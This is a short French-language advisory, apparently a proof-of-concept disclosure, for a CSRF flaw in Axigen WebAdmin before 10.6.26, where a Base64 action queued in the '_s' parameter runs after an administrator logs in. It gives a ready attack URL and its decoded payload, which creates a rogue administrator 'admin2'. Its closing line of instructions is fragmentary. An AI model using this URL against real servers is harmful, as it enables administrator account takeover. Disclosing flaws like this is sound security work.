
Axigen WebAdmin Vulnérabilité CSRF
Les actions critiques de changement d'état dans l'interface Axigen WebAdmin sont accessibles via des requêtes GET. Alors que le jeton _h protège contre la CSRF directe, l'application traite les requêtes mises en file d'attente via le paramètre _s (breadcrumb) immédiatement après l'authentification d'un utilisateur.
Un attaquant peut créer une URL contenant une charge utile encodée en Base64 dans le paramètre _s. Si un administrateur clique sur ce lien et termine le processus de connexion, l'action mise en file d'attente est exécutée automatiquement dans son contexte.
Versions concernées : < 10.6.26
Pour plus d'informations, consultez la base de connaissances Axigen.
URL cible :
https://{axigen-domain}:9443/?_h=invalid&_s=eyJwYWdlIjoiYXVzciIsInBhcmFtcyI6eyJhY3Rpb24iOiJhZGQiLCAidXNlcm5hbWVfaW5wdXQiOiJhZG1pbjIiLCAicGFzc3dvcmRfaW5wdXQiOiJhZG1pbjIiLCAiZGlzcGxheV9uYW1lX2lucHV0IjoiYWRtaW4yIn19
Charge utile décodée (paramètre _s) :
{"page":"ausr","params":{"action":"add", "username_input":"admin2", "password_input":"admin2", "display_name_input":"admin2"}}
_s dans l'URL d'attaque et livrez-la à un administrateur cible.admin2 est créé (ou votre action personnalisée est exécutée).